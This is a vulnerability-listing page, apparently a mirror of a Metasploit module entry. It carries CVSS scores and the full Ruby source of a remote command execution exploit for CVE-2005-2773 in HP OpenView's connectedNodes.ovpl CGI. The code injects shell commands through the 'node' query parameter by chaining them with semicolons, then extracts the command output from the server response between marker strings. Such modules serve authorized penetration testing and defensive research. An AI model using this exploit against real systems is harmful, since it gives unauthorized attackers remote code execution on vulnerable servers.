HP Openview connectedNodes.ovpl Remote Command Execution

2007-01-0504:28:32

Valerio Tesei <[email protected]>, hdm <[email protected]>

www.rapid7.com

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

JSON

This module exploits an arbitrary command execution vulnerability in the HP OpenView connectedNodes.ovpl CGI application. The results of the command will be displayed to the screen.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP Openview connectedNodes.ovpl Remote Command Execution',
      'Description'    => %q{
          This module exploits an arbitrary command execution vulnerability in the
        HP OpenView connectedNodes.ovpl CGI application. The results of the command
        will be displayed to the screen.
      },
      'Author'         => [ 'Valerio Tesei <valk[at]mojodo.it>', 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2005-2773'],
          ['OSVDB', '19057'],
          ['BID', '14662'],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 1024,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet',
            }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => '2005-08-25',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('URI', [true, "The full URI path to connectedNodes.ovpl", "/OvCgi/connectedNodes.ovpl"]),
      ])
  end

  def exploit

    # Trigger the command execution bug
    res = send_request_cgi({
        'uri'      => normalize_uri(datastore['URI']),
        'vars_get' =>
          {
            'node'    => %Q!; echo YYY; #{payload.encoded}; echo YYY| tr "\\n" "#{0xa3.chr}"!
          }
        }, 25)

    if (res)
      print_status("The server returned: #{res.code} #{res.message}")
      print("")

      m = res.body.match(/YYY(.*)YYY/)

      if (m)
        print_status("Command output from the server:")
        print(m[1])
      else
        print_status("This server may not be vulnerable")
      end

    else
      print_status("No response from the server")
    end
  end
end